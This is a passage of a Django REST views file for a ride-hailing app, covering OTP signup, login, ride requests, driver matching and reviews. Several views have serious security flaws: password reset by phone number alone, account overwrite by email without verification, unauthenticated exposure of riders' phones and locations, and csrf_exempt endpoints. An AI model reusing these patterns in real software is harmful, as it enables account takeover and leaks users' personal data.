Response({'error': 'Email already registered'}, status=status.HTTP_400_BAD_REQUEST)\n\n # Generate OTP and save it to the user model\n otp = str(randint(100000, 999999))\n user = User(email=email, otp=otp)\n user.otp = otp\n user.save()\n\n # Send OTP to the user's email\n send_mail(\n 'OTP Verification',\n f'Your OTP is {otp}',\n settings.EMAIL_HOST_USER,\n [email],\n fail_silently=False,\n )\n\n return Response({'success': 'OTP has been sent to your email address.', 'email': email}, status=status.HTTP_200_OK)\n\nclass VerifyOTPAPIView(APIView):\n def post(self, request):\n User = get_user_model()\n email = request.data.get('email')\n otp = request.data.get('otp')\n if not email or not otp:\n return Response({'error': 'Please provide your email and OTP'}, status=status.HTTP_400_BAD_REQUEST)\n\n user = get_object_or_404(User, email=email)\n if user.otp != otp:\n return Response({'error': 'Invalid OTP'}, status=status.HTTP_400_BAD_REQUEST)\n\n 
user.otp = ''\n        user.save()\n\n        return Response({'success': 'OTP has been verified', 'email': email}, status=status.HTTP_200_OK)\n\nclass SignupView(APIView):\n    def post(self, request):\n        full_name = request.data.get('full_name')\n        city = request.data.get('city')\n        password = request.data.get('password')\n        phone_number = request.data.get('phone_number')\n\n        # Retrieve email from request data\n        email = request.data.get('email')\n\n        # Check if user already exists with the provided email\n        try:\n            user = CustomUser.objects.get(email=email)\n            # If full_name is not provided, return error response\n            if not full_name:\n                return Response({\"message\": \"User already exists.\"}, status=status.HTTP_400_BAD_REQUEST)\n            # If full_name is provided, update user data and save to database\n            user.full_name = full_name\n            user.city = city\n            user.phone_number = phone_number\n            user.set_password(password)\n            user.save()\n            # Serialize and return updated user data\n            return Response({\"message\": \"Signup successful\", \"full_name\": full_name, \"city\": city}, status=status.HTTP_200_OK)\n        except CustomUser.DoesNotExist:\n            pass\n\n        # Create new user object and save to database\n        user = CustomUser(full_name=full_name, city=city, email=email)\n        user.set_password(password)\n        user.save()\n\n        # Serialize and return user data (name matches the import in this module)\n        serializer = CustomUserSerailizer(user)\n        return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n\nclass LoginView(ObtainAuthToken):\n    serializer_class = LoginSerializer\n\n    def post(self, request, *args, **kwargs):\n        serializer = self.serializer_class(data=request.data, context={'request': request})\n        serializer.is_valid(raise_exception=True)\n        user = serializer.validated_data['user']\n        token, created = Token.objects.get_or_create(user=user)\n        return Response({'token': token.key})\n\nclass UpdatePasswordView(APIView):\n    def put(self, request):\n        phone_number = request.data.get('phone_number')\n        password = request.data.get('password')\n\n        # Check if user exists\n        try:\n            user = get_user_model().objects.get(phone_number=phone_number)\n        except get_user_model().DoesNotExist:\n            return Response({\"message\": \"User does not exist.\"}, status=status.HTTP_400_BAD_REQUEST)\n\n        # Update password\n        user.set_password(password)\n        user.save()\n\n        return Response({\"message\": \"Password updated successfully.\"}, status=status.HTTP_200_OK)\n\n\nclass SelectLocationView(APIView):\n    def post(self, request):\n        token_value = request.data.get('token')\n        if token_value is None:\n            return Response({'error': 'Token not provided'}, status=status.HTTP_400_BAD_REQUEST)\n\n        try:\n            token = Token.objects.get(key=token_value)\n            user = CustomUser.objects.get(id=token.user_id)\n        except Token.DoesNotExist:\n            return Response({'error': 'Invalid token'}, status=status.HTTP_400_BAD_REQUEST)\n        except CustomUser.DoesNotExist:\n            return Response({'error': 'User not found'}, status=status.HTTP_400_BAD_REQUEST)\n\n        current_location = request.data.get('current_location', None)\n        current_coordinates = request.data.get('current_coordinates', None)\n        destination_location = request.data.get('destination_location', None)\n        destination_coordinates = request.data.get('destination_coordinates', None)\n\n        if current_location is None or destination_location is None or current_coordinates is None or destination_coordinates is None:\n            return Response({'error': 'current_location, current_coordinates, destination_location and destination_coordinates are required fields.'},\n                            status=status.HTTP_400_BAD_REQUEST)\n\n        user.current_location = current_location\n        
user.current_coordinates = current_coordinates\n user.destination_location = destination_location\n user.destination_coordinates = destination_coordinates\n user.save()\n\n return Response({'success': 'Locations saved successfully.', 'token': token_value, 'current_location': current_location, 'destination_location': destination_location, 'current_coordinates': current_coordinates, 'destination_coordinates': destination_coordinates}, status=status.HTTP_200_OK)\n\n\n@csrf_exempt\n@api_view(['POST'])\ndef ride_request_view(request):\n # get current user based on token\n token_value = request.data.get('token')\n if token_value is None:\n return JsonResponse({'error': 'Token not provided'}, status=400)\n\n try:\n token = Token.objects.get(key=token_value)\n User = get_user_model()\n user = User.objects.get(id=token.user_id)\n except Token.DoesNotExist:\n return JsonResponse({'error': 'Invalid token'}, status=400)\n except User.DoesNotExist:\n return JsonResponse({'error': 'User not found'}, status=400)\n\n # get ride details from request data\n ride_type = request.data.get('ride_type')\n entire_cabin = request.data.get('entire_cabin')\n mini_cabin = request.data.get('mini_cabin')\n shared_cabin = request.data.get('shared_cabin')\n num_passengers = request.data.get('num_passengers')\n price = request.data.get('price')\n\n # generate a request_id\n request_id = ''.join(random.choices('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789', k=10))\n\n # create and save ride request\n riderequest = RideRequest.objects.create(\n ride_type=ride_type,\n entire_cabin=entire_cabin,\n mini_cabin=mini_cabin,\n shared_cabin=shared_cabin,\n price=price,\n num_passengers=num_passengers,\n user=user,\n request_id=request_id\n )\n riderequest.save()\n\n return Response({'message': 'Ride request created successfully', 'request_id': request_id}, status=200)\n\n\n@api_view(['POST'])\ndef get_ride_details(request):\n request_id = request.data.get('request_id')\n radius = request.data.get('radius') or 10\n if request_id is None:\n return Response({'error': 'Request ID not provided'}, status=400)\n\n try:\n riderequest = RideRequest.objects.get(request_id=request_id)\n user = riderequest.user\n user_location = user.current_coordinates\n if user_location is None:\n return Response({'error': 'User location not available'}, status=400)\n\n drivers = CustomDriver.objects.filter(current_coordinates__isnull=False)\n nearby_drivers = []\n for driver in drivers:\n driver_location = driver.current_coordinates\n if driver_location:\n driver_coords = (driver_location.get('current_coordinates'))\n user_coords = (user_location.get('current_coordinates'))\n if distance.distance(driver_coords, user_coords).km <= radius:\n nearby_drivers.append(driver)\n\n ride_details = {\n 'ride_type': riderequest.ride_type,\n 'entire_cabin': riderequest.entire_cabin,\n 'mini_cabin': riderequest.mini_cabin,\n 'shared_cabin': riderequest.shared_cabin,\n 'price': riderequest.price,\n 'num_passengers': riderequest.num_passengers,\n }\n user_details = {\n 'full_name': riderequest.user.full_name,\n 'phone_number': riderequest.user.phone_number,\n 'current_location': riderequest.user.current_location,\n 'current_coordinates': riderequest.user.current_coordinates,\n 'destination_location': riderequest.user.destination_location,\n 'destination_coordinates': riderequest.user.destination_coordinates,\n }\n return Response({'ride_details': ride_details, 'user_details': user_details})\n except RideRequest.DoesNotExist:\n return Response({'error': 'Invalid Request ID'}, 
status=400)\n\n\n@api_view(['POST'])\ndef create_driver(request):\n email = request.data.get('email')\n full_name = request.data.get('full_name')\n city = request.data.get('city')\n current_coordinates = request.data.get('current_coordinates')\n\n # check if all required fields are present\n if not email or not full_name or not city or not current_coordinates:\n return Response({'error': 'Please provide all required fields.'}, status=status.HTTP_400_BAD_REQUEST)\n\n # create the CustomDriver object\n driver = CustomDriver(email=email, full_name=full_name, city=city, current_coordinates=current_coordinates)\n\n # save the object to the database\n driver.save()\n\n return Response({'success': 'CustomDriver object created successfully.'}, status=status.HTTP_201_CREATED)\n\n\n@csrf_exempt\n@api_view(['POST'])\ndef find_driver(request):\n User = CustomDriver\n # get request parameters\n request_id = request.data.get('request_id')\n radius = request.data.get('radius') or 10 # default radius is 10 km\n\n # get user request coordinates\n user = CustomUser.objects.get(riderequest__request_id=request_id)\n user_coords = (user.current_coordinates.get('current_coordinates'))\n\n # find drivers within radius\n drivers = User.objects.filter(\n is_active=True, # only active drivers\n current_coordinates__isnull=False # only drivers with current coordinates\n )\n\n # filter drivers within radius\n nearby_drivers = []\n for driver in drivers:\n if driver.current_coordinates:\n driver_coords = (driver.current_coordinates.get('current_coordinates'))\n if distance.distance(driver_coords, user_coords).km <= radius:\n nearby_drivers.append(driver)\n\n # create response data\n response_data = {\n 'nearby_drivers': [{'email': driver.email, 'full_name': driver.full_name, 'city': driver.city} for driver in nearby_drivers]\n }\n\n return JsonResponse(response_data)\n\n\n@api_view(['POST'])\ndef get_driver_details(request):\n request_id = request.data.get('request_id')\n\n if request_id is None:\n return Response({'error': 'Request ID not provided'}, status=400)\n\n try:\n ride_request = RideRequest.objects.get(request_id=request_id)\n except RideRequest.DoesNotExist:\n return Response({'error': 'Invalid Request ID'}, status=400)\n\n accepted_drivers = AcceptedDriver.objects.filter(ride_request=ride_request)\n driver_details = []\n\n for accepted_driver in accepted_drivers:\n driver = accepted_driver.driver\n driver_info = {\n 'email': driver.email,\n 'full_name': driver.full_name,\n # Add more driver details as needed\n }\n driver_details.append(driver_info)\n\n response_data = {\n 'request_id': request_id,\n 'drivers': driver_details\n }\n\n return Response(response_data)\n\n@api_view(['POST'])\ndef accept_ride(request):\n request_id = request.data.get('request_id')\n driver_full_name = request.data.get('driver_full_name')\n ride_status = request.data.get('ride_status')\n\n if not request_id or not driver_full_name or ride_status is None:\n return Response({'error': 'Incomplete parameters'}, status=400)\n try:\n ride_request = RideRequest.objects.get(request_id=request_id)\n if ride_request.ride_status == 'Accepted': # Check if the ride request has already been accepted\n return Response({'error': 'Ride request has already been accepted'}, status=400)\n\n if ride_request.ride_status == 'Pending':\n driver = CustomDriver.objects.get(full_name=driver_full_name)\n ride_request.accepted_driver_id = driver.id\n ride_request.ride_status = 'Accepted'\n ride_request.save()\n # You can perform any additional actions here 
when the ride request is accepted\n\n # Retrieve the details of the accepted driver\n driver_details = {\n 'email': driver.email,\n 'full_name': driver.full_name,\n # Include any other driver details you want to return\n }\n\n return Response({'driver_details': driver_details, 'request_id': request_id})\n else:\n return Response({'error': 'Invalid ride status'}, status=400)\n\n except RideRequest.DoesNotExist:\n return Response({'error': 'Invalid Request ID'}, status=400)\n except CustomDriver.DoesNotExist:\n return Response({'error': 'Driver not found'}, status=400)\n\n\nclass TimeAndCoordinatesUpdater:\n def __init__(self, ride_request):\n self.ride_request = ride_request\n\n def update(self):\n driver = self.ride_request.accepted_driver\n\n if not driver:\n return\n\n driver_coordinates = driver.current_coordinates\n user_coordinates = self.ride_request.user.current_coordinates\n\n if not driver_coordinates or not user_coordinates:\n return\n\n driver_coords = (driver_coordinates.get('current_lat'), driver_coordinates.get('current_long'))\n user_coords = (user_coordinates.get('current_lat'), user_coordinates.get('current_long'))\n distance_km = distance.distance(driver_coords, user_coords).km\n\n average_speed = 60\n estimated_time = distance_km / average_speed\n\n self.ride_request.estimated_time = estimated_time\n self.ride_request.save()\n\n # Schedule the next update after 30 seconds\n threading.Timer(30, self.update).start()\n\n@api_view(['POST'])\ndef calculate_time(request):\n request_id = request.data.get('request_id')\n\n if not request_id:\n return Response({'error': 'Incomplete parameters'}, status=400)\n\n try:\n ride_request = RideRequest.objects.get(request_id=request_id)\n\n if ride_request.ride_status != 'Accepted':\n return Response({'error': 'Ride request has not been accepted'}, status=400)\n\n updater = TimeAndCoordinatesUpdater(ride_request)\n\n # Start the periodic update of time and coordinates\n updater.update()\n\n driver = ride_request.accepted_driver\n\n if not driver:\n return Response({'error': 'Accepted driver not found'}, status=400)\n\n driver_name = driver.full_name\n driver_coordinates = driver.current_coordinates\n user_coordinates = ride_request.user.current_coordinates\n\n return Response({'driver_name': driver_name, 'estimated_time': ride_request.estimated_time, 'driver_coordinates': driver_coordinates, 'user_coordinates': user_coordinates})\n except RideRequest.DoesNotExist:\n return Response({'error': 'Invalid Request ID'}, status=400)\n\n\n@api_view(['POST'])\ndef calculate_time1(request):\n request_id = request.data.get('request_id')\n\n if not request_id:\n return Response({'error': 'Incomplete parameters'}, status=400)\n\n try:\n ride_request = RideRequest.objects.get(request_id=request_id)\n\n if ride_request.ride_status != 'Accepted':\n return Response({'error': 'Ride request has not been accepted'}, status=400)\n\n driver = ride_request.accepted_driver\n\n if not driver:\n return Response({'error': 'Accepted driver not found'}, status=400)\n\n def update_time_and_coordinates():\n driver_coordinates = driver.current_coordinates\n user_coordinates = ride_request.user.current_coordinates\n\n if not driver_coordinates or not user_coordinates:\n return\n\n driver_coords = (driver_coordinates.get('current_lat'), driver_coordinates.get('current_long'))\n user_coords = (user_coordinates.get('current_lat'), user_coordinates.get('current_long'))\n distance_km = distance.distance(driver_coords, user_coords).km\n\n average_speed = 30 # Modify the 
average speed value based on the driver's expected speed\n\n estimated_time = (distance_km / average_speed) * 60\n estimated_time = round(estimated_time, 2)\n\n ride_request.estimated_time = estimated_time\n ride_request.save()\n\n # Schedule the next update after 30 seconds\n threading.Timer(30, update_time_and_coordinates).start()\n\n # Start the periodic update of time and coordinates\n update_time_and_coordinates()\n\n driver_name = driver.full_name\n user_name = ride_request.user.full_name\n driver_coordinates = driver.current_coordinates\n user_coordinates = ride_request.user.current_coordinates\n\n return Response({'user_name': user_name, 'driver_name': driver_name, 'estimated_time': ride_request.estimated_time, 'driver_coordinates': driver_coordinates, 'user_coordinates': user_coordinates})\n except RideRequest.DoesNotExist:\n return Response({'error': 'Invalid Request ID'}, status=400)\n\n\n@api_view(['POST'])\ndef write_review(request):\n driver_full_name = request.data.get('driver_full_name')\n user_full_name = request.data.get('user_full_name')\n note = request.data.get('note')\n rating = request.data.get('rating')\n\n if not driver_full_name or not user_full_name or not note or rating is None:\n return Response({'error': 'Incomplete parameters'}, status=400)\n\n try:\n driver = CustomDriver.objects.get(full_name=driver_full_name)\n user = CustomUser.objects.get(full_name=user_full_name)\n\n review, created = Review.objects.get_or_create(driver=driver, user=user)\n if not created:\n return Response({'error': 'Review already exists for this driver'}, status=400)\n\n review.note = note\n review.rating = rating\n review.save()\n\n return Response({'success': 'Review saved successfully'})\n except CustomDriver.DoesNotExist:\n return Response({'error': 'Driver not found'}, status=400)\n except CustomUser.DoesNotExist:\n return Response({'error': 'User not found'}, status=400)\n\n\n@api_view(['GET'])\ndef driver_reviews(request):\n driver_name = request.data.get('driver_name')\n\n if not driver_name:\n return Response({'error': 'Driver name parameter is required'}, status=400)\n\n try:\n driver = CustomDriver.objects.get(full_name=driver_name)\n serializer = DriverReviewSerializer(driver)\n return Response(serializer.data)\n except CustomDriver.DoesNotExist:\n return Response({'error': 'Driver not found'}, status=404)\n\n\n@api_view(['POST'])\ndef verify_payment(request):\n request_id = request.data.get('request_id')\n payment = request.data.get('payment')\n\n if not request_id or not payment:\n return Response({'error': 'Incomplete parameters'}, status=400)\n\n try:\n ride_request = RideRequest.objects.get(request_id=request_id)\n\n if ride_request.price == Decimal(payment):\n return Response({'message': 'Payment done', 'request_id': ride_request.request_id})\n else:\n # Payment verification failed\n return Response({'error': 'Payment verification failed'}, status=400)\n\n except RideRequest.DoesNotExist:\n return Response({'error': 'Invalid Request ID'}, status=400)\n\n\nclass DriverRegisterAndSendOTP(APIView):\n def post(self, request):\n email = request.data.get('email')\n if not email:\n return Response({'error': 'Please provide your email'}, status=status.HTTP_400_BAD_REQUEST)\n\n # Check if email is already registered\n if CustomDriver.objects.filter(email=email).exists():\n return Response({'error': 'Email already registered'}, status=status.HTTP_400_BAD_REQUEST)\n\n # Generate OTP and save it to the driver model\n otp = str(randint(1000, 9999))\n driver = 
CustomDriver(email=email, otp=otp)\n driver.save()\n\n # Send OTP to the driver's email\n send_mail(\n 'OTP Verification',\n f'Your Driver verification OTP is {otp}',\n settings.EMAIL_HOST_USER,\n [email],\n fail_silently=False,\n )\n\n return Response({'success': 'OTP has been sent to your email address.', 'email': email}, status=status.HTTP_200_OK)\n\n\nclass DriverVerifyOTPAPIView(APIView):\n def post(self, request):\n email = request.data.get('email')\n otp = request.data.get('otp')\n if not email or not otp:\n return Response({'error': 'Please provide your email and OTP'}, status=status.HTTP_400_BAD_REQUEST)\n\n driver = get_object_or_404(CustomDriver, email=email)\n if driver.otp != otp:\n return Response({'error': 'Invalid OTP'}, status=status.HTTP_400_BAD_REQUEST)\n\n driver.otp = ''\n driver.save()\n\n return Response({'success': 'OTP has been verified', 'email': email}, status=status.HTTP_200_OK)\n\n\nclass driverSignupView1(APIView):\n def post(self, request):\n full_name = request.data.get('full_name')\n gender = request.data.get('gender')\n state = request.data.get('state')\n city = request.data.get('city')\n residential_address = request.data.get('residential_address')\n phone_number = request.data.get('phone_number')\n email = request.data.get('email')\n\n try:\n driver = CustomDriver.objects.get(email=email)\n if not full_name:\n return Response({\"message\": \"Driver already exists.\"}, status=status.HTTP_400_BAD_REQUEST)\n driver.full_name = full_name\n driver.gender = gender\n driver.state = state\n driver.city = city\n driver.residential_address = residential_address\n driver.phone_number = phone_number\n driver.save()\n return Response({\"message\": \"Signup successful\", \"email\": email, \"full_name\": full_name, \"city\": city}, status=status.HTTP_200_OK)\n except CustomDriver.DoesNotExist:\n pass\n\n driver = CustomDriver(full_name=full_name, gender=gender, state=state, city=city, residential_address=residential_address, phone_number=phone_number, email=email)\n driver.save()\n\n return Response({\"message\": \"Signup successful\", \"email\": email, \"full_name\": full_name, \"city\": city}, status=status.HTTP_200_OK)\n\n\nclass driverSignupView2(APIView):\n parser_classes = [MultiPartParser]\n\n def post(self, request):\n vehicle_image = request.FILES.get('vehicle_image')\n model_name = request.data.get('model_name')\n model_number = request.data.get('model_number')\n vehicle_year = request.data.get('vehicle_year')\n license_plate = request.data.get('license_plate')\n vehicle_description = request.data.get('vehicle_description')\n\n if not vehicle_image or not model_name or not model_number or not vehicle_year or not license_plate or vehicle_description is None:\n return Response({'error': 'Incomplete parameters'}, status=400)\n\n # Retrieve email from request data\n email = request.data.get('email')\n\n # Check if driver already exists with the provided email\n try:\n driver = CustomDriver.objects.get(email=email)\n except CustomDriver.DoesNotExist:\n driver = CustomDriver(\n email=email,\n vehicle_image=vehicle_image,\n model_name=model_name,\n model_number=model_number,\n vehicle_year=vehicle_year,\n license_plate=license_plate,\n vehicle_description=vehicle_description\n )\n driver.save()\n return Response({\"message\": \"Signup successful\", \"email\": email}, status=status.HTTP_200_OK)\n\n # Update the existing driver's data\n driver.vehicle_image = vehicle_image\n driver.model_name = model_name\n driver.model_number = model_number\n driver.vehicle_year = 
vehicle_year\n driver.license_plate = license_plate\n driver.vehicle_description = vehicle_description\n driver.save()\n\n return Response({\"message\": \"Driver data posted.\"}, status=status.HTTP_200_OK)\n\n\nclass driverSignupView3(APIView):\n parser_classes = [MultiPartParser]\n\n def post(self, request):\n select_vehicle = request.data.get('select_vehicle')\n ac_heater = request.data.get('ac_heater')\n none = request.data.get('none')\n aadhar_card = request.FILES.get('aadhar_card')\n pan_card = request.FILES.get('pan_card')\n driving_license = request.FILES.get('driving_license')\n rc_book = request.FILES.get('rc_book')\n email = request.data.get('email')\n\n if not select_vehicle or ac_heater not in ['true', 'false'] or none not in ['true', 'false'] or not aadhar_card or not pan_card or not driving_license or rc_book is None:\n return Response({'error': 'Incomplete parameters'}, status=400)\n\n try:\n driver = CustomDriver.objects.get(email=email)\n except CustomDriver.DoesNotExist:\n driver = CustomDriver(email=email)\n\n driver.select_vehicle = select_vehicle\n driver.ac_heater = True if ac_heater.lower() == 'true' else False\n driver.none = True if none.lower() == 'true' else False\n driver.aadhar_card = aadhar_card\n driver.pan_card = pan_card\n driver.driving_license = driving_license\n driver.rc_book = rc_book\n driver.save()\n\n return Response({\"message\": \"Driver data posted.\", \"email\": email}, status=status.HTTP_200_OK)\n\n\nclass CustomDriverLoginView(ObtainAuthToken):\n def post(self, request, *args, **kwargs):\n email = request.data.get('email')\n password = request.data.get('password')\n\n try:\n driver = CustomDriver.objects.get(email=email)\n if driver.check_password(password):\n # Generate or retrieve the driver's token\n token, created = CustomDriverToken.objects.get_or_create(driver=driver)\n return Response({\"message\": \"Login Successful\", 'token': token.key})\n except CustomDriver.DoesNotExist:\n pass\n\n return Response({\"message\": \"Invalid login credentials\"}, status=status.HTTP_401_UNAUTHORIZED)\n\n\nclass CustomDriverLocationView(APIView):\n def post(self, request):\n token_value = request.data.get('token')\n if token_value is None:\n return Response({'error': 'Token not provided'}, status=status.HTTP_400_BAD_REQUEST)\n\n try:\n token = CustomDriverToken.objects.get(key=token_value)\n driver = CustomDriver.objects.get(id=token.driver_id)\n except Token.DoesNotExist:\n return Response({'error': 'Invalid token'}, status=status.HTTP_400_BAD_REQUEST)\n except CustomDriver.DoesNotExist:\n return Response({'error': 'Driver not found'}, status=status.HTTP_400_BAD_REQUEST)\n\n current_location = request.data.get('current_location', None)\n current_coordinates = request.data.get('current_coordinates', None)\n\n if current_location is None or current_coordinates is None:\n return Response({'error': 'current_location and current_coordinates are required fields.'},\n status=status.HTTP_400_BAD_REQUEST)\n\n driver.current_location = current_location\n driver.current_coordinates = current_coordinates\n driver.save()\n\n return Response(\n {'success': 'Locations saved successfully.', 'token': token_value, 'current_location': current_location, 'current_coordinates': current_coordinates}, status=status.HTTP_200_OK)\n\n\nclass GetRequestIDView(APIView):\n def post(self, request):\n token = request.data.get('token')\n current_coordinates = request.data.get('current_coordinates')\n\n driver = CustomDriverToken.objects.get(key=token)\n ride_requests = 
RideRequest.objects.filter(ride_status='pending')\n driver_coordinates = (float(driver.driver.current_coordinates['current_lat']), float(driver.driver.current_coordinates['current_long']))\n\n # Iterate over the ride requests and check if the distance is within 5km\n valid_requests = []\n for ride_request in ride_requests:\n user_coordinates = (float(ride_request.user.current_coordinates['current_lat']), float(ride_request.user.current_coordinates['current_long']))\n user_destination = (float(ride_request.user.destination_coordinates['dest_lat']), float(ride_request.user.destination_coordinates['dest_long']))\n if distance.distance(driver_coordinates, user_coordinates).km <= 5:\n pickup_distance = round(distance.distance(driver_coordinates, user_coordinates).km)\n destination_distance = round(distance.distance(driver_coordinates, user_destination).km)\n request_details = {\n 'request_id': ride_request.request_id,\n 'user_name': ride_request.user.full_name,\n 'current_location': ride_request.user.current_location,\n 'destination_location': ride_request.user.destination_location,\n 'pickup distance': pickup_distance,\n 'destination distance': destination_distance\n }\n valid_requests.append(request_details)\n\n # Return the list of valid request IDs\n return Response({'token': token, 'request_ids': valid_requests}, status=status.HTTP_200_OK)\n\n\nclass AcceptRequestView(APIView):\n def post(self, request):\n # Get the request ID and driver's token from the request data\n request_id = request.data.get('request_id')\n token = request.data.get('token')\n is_accepted = request.data.get('is_accepted')\n\n # Retrieve the requested ride\n try:\n ride_request = RideRequest.objects.get(request_id=request_id)\n except RideRequest.DoesNotExist:\n return Response({\"message\": \"Invalid request ID\"}, status=status.HTTP_404_NOT_FOUND)\n\n # Get the driver object using the token\n try:\n driver = CustomDriverToken.objects.get(key=token).driver\n except CustomDriverToken.DoesNotExist:\n return Response({\"message\": \"Invalid token\"}, status=status.HTTP_401_UNAUTHORIZED)\n\n if is_accepted:\n # Create a new AcceptedDriver instance for the ride request\n accepted_driver = AcceptedDriver.objects.create(\n ride_request=ride_request,\n driver=driver,\n driver_name=driver.full_name,\n driver_phone=driver.phone_number,\n driver_license_plate=driver.license_plate,\n driver_car_modelname=driver.model_name,\n )\n else:\n # Remove the ride request from accepted drivers\n AcceptedDriver.objects.filter(ride_request=ride_request, driver=driver).delete()\n\n return Response({\"message\": \"Request updated\", \"request_id\": ride_request.request_id}, status=status.HTTP_200_OK)\n\n\n@api_view(['GET'])\ndef check_request_status(request):\n # Get the driver's token from the request headers\n token = request.data.get('token')\n\n # Get the request ID from the request query parameters\n request_id = request.data.get('request_id')\n\n if not request_id:\n return Response({'error': 'Request ID not provided'}, status=status.HTTP_400_BAD_REQUEST)\n\n try:\n driver = CustomDriverToken.objects.get(key=token).driver\n except CustomDriverToken.DoesNotExist:\n return Response({'error': 'Invalid token'}, status=status.HTTP_401_UNAUTHORIZED)\n\n try:\n ride_request = RideRequest.objects.get(request_id=request_id, accepteddriver__driver=driver)\n except RideRequest.DoesNotExist:\n return Response({'message': 'Request not accepted'}, status=status.HTTP_404_NOT_FOUND)\n driver_coordinates = (\n 
float(driver.current_coordinates['current_lat']), float(driver.current_coordinates['current_long']))\n user_coordinates = (float(ride_request.user.current_coordinates['current_lat']),\n float(ride_request.user.current_coordinates['current_long']))\n pickup_distance = round(distance.distance(driver_coordinates, user_coordinates).km, 2)\n\n # Get additional details\n accepted_driver = AcceptedDriver.objects.get(ride_request=ride_request)\n driver_details = {\n 'name': accepted_driver.driver_name,\n 'phone': accepted_driver.driver_phone,\n 'license_plate': accepted_driver.driver_license_plate,\n 'car_modelname': accepted_driver.driver_car_modelname\n }\n\n # Prepare the response data\n response_data = {\n 'message': 'Request accepted',\n 'request_id': ride_request.request_id,\n 'pickup_distance': pickup_distance,\n 'driver_details': driver_details,\n 'current_location': ride_request.user.current_location,\n 'destination_location': ride_request.user.destination_location\n }\n\n return Response(response_data, status=status.HTTP_200_OK)\n\n\n@api_view(['POST'])\ndef driver_calculate_time(request):\n request_id = request.data.get('request_id')\n\n if not request_id:\n return Response({'error': 'Incomplete parameters'}, status=400)\n\n try:\n ride_request = RideRequest.objects.get(request_id=request_id)\n\n if ride_request.ride_status != 'Accepted':\n return Response({'error': 'Ride request has not been accepted'}, status=400)\n\n driver = ride_request.accepted_driver\n\n if not driver:\n return Response({'error': 'Accepted driver not found'}, status=400)\n\n def update_time_and_coordinates():\n driver_coordinates = driver.current_coordinates\n user_coordinates = ride_request.user.current_coordinates\n\n if not driver_coordinates or not user_coordinates:\n return\n\n driver_coords = (driver_coordinates.get('current_lat'), driver_coordinates.get('current_long'))\n user_coords = (user_coordinates.get('current_lat'), user_coordinates.get('current_long'))\n distance_km = distance.distance(driver_coords, user_coords).km\n\n average_speed = 30 # Modify the average speed value based on the driver's expected speed\n\n estimated_time = (distance_km / average_speed) * 60\n estimated_time = round(estimated_time, 2)\n\n ride_request.estimated_time = estimated_time\n ride_request.save()\n\n # Schedule the next update after 30 seconds\n threading.Timer(30, update_time_and_coordinates).start()\n\n # Start the periodic update of time and coordinates\n update_time_and_coordinates()\n\n driver_name = driver.full_name\n user_name = ride_request.user.full_name\n driver_coordinates = driver.current_coordinates\n user_coordinates = ride_request.user.current_coordinates\n\n return Response({'user_name': user_name, 'driver_name': driver_name, 'estimated_time': ride_request.estimated_time, 'driver_coordinates': driver_coordinates, 'user_coordinates': user_coordinates})\n except RideRequest.DoesNotExist:\n return Response({'error': 'Invalid Request ID'}, status=400)\n\n\n@api_view(['POST'])\ndef driver_destination_calculate_time(request):\n request_id = request.data.get('request_id')\n\n if not request_id:\n return Response({'error': 'Incomplete parameters'}, status=400)\n\n try:\n ride_request = RideRequest.objects.get(request_id=request_id)\n\n if ride_request.ride_status != 'Accepted':\n return Response({'error': 'Ride request has not been accepted'}, status=400)\n\n driver = ride_request.accepted_driver\n\n if not driver:\n return Response({'error': 'Accepted driver not found'}, status=400)\n\n user_coordinates = 
ride_request.user.current_coordinates\n        destination_coordinates = ride_request.user.destination_coordinates\n\n        if not user_coordinates or not destination_coordinates:\n            return Response({'error': 'Incomplete user or destination coordinates'}, status=400)\n\n        driver_coordinates = driver.current_coordinates\n\n        if not driver_coordinates:\n            return Response({'error': 'Driver coordinates not found'}, status=400)\n\n        driver_coords = (driver_coordinates.get('current_lat'), driver_coordinates.get('current_long'))\n        user_coords = (user_coordinates.get('current_lat'), user_coordinates.get('current_long'))\n        destination_coords = (destination_coordinates.get('dest_lat'), destination_coordinates.get('dest_long'))  # destination_coordinates uses dest_lat/dest_long keys, as in GetRequestIDView\n        estimated_time = distance.distance(user_coords, destination_coords).km / 80  # Adjust the average speed as per your requirement\n        ride_completion = distance.distance(driver_coords, user_coords).km / (distance.distance(driver_coords, user_coords).km + distance.distance(user_coords, destination_coords).km) * 100  # Calculate the ride completion percentage\n        price = ride_request.price  # Retrieve the price from the RideRequest model\n        destination_location = ride_request.user.destination_location\n\n        response_data = {\n            'estimated_time': round(estimated_time, 2),\n            'ride_completion': round(ride_completion, 2),\n            'price': price,\n            'destination location': destination_location,\n        }\n\n        return Response(response_data, status=status.HTTP_200_OK)\n\n    except RideRequest.DoesNotExist:\n        return Response({'error': 'Invalid Request ID'}, status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view(['GET'])\ndef check_user_location(request):\n    # Get the driver's token from the request data\n    token = request.data.get('token')\n\n    # Get the request ID from the request data\n    request_id = request.data.get('request_id')\n\n    # Get the is_located status from the request data\n    is_located = request.data.get('is_located')\n\n    if not request_id:\n        return Response({'error': 'Request ID not provided'}, status=status.HTTP_400_BAD_REQUEST)\n\n    try:\n        driver = CustomDriverToken.objects.get(key=token).driver\n    except CustomDriverToken.DoesNotExist:\n        return Response({'error': 'Invalid token'}, status=status.HTTP_401_UNAUTHORIZED)\n\n    try:\n        ride_request = RideRequest.objects.get(request_id=request_id, accepteddriver__driver=driver)\n    except RideRequest.DoesNotExist:\n        return Response({'message': 'Request not accepted'}, status=status.HTTP_404_NOT_FOUND)\n\n    if is_located == 'yes':\n        # Driver has located the user\n        user = ride_request.user\n        response_data = {\n            'request_id': ride_request.request_id,\n            'located': 'yes',\n            'user_full_name': user.full_name,\n            'user_current_location': user.current_location,\n            'user_destination_location': user.destination_location\n        }\n    elif is_located == 'no':\n        # Driver hasn't located the user yet\n        response_data = {\n            'request_id': ride_request.request_id,\n            'located': 'no',\n            'message': 'wait'\n        }\n    else:\n        return Response({'error': 'Invalid is_located value'}, status=status.HTTP_400_BAD_REQUEST)\n\n    return Response(response_data, status=status.HTTP_200_OK)\n\n\nclass AdminView(APIView):\n    def post(self, request):\n        admin_name = request.data.get('admin_name')\n        password = request.data.get('password')\n\n        # Check if admin already exists with the provided admin_name\n        try:\n            admin = Admin.objects.get(admin_name=admin_name)\n            return Response({\"message\": \"Admin already exists.\"}, status=status.HTTP_400_BAD_REQUEST)\n        except Admin.DoesNotExist:\n            pass\n\n        # Create new admin object and save to 
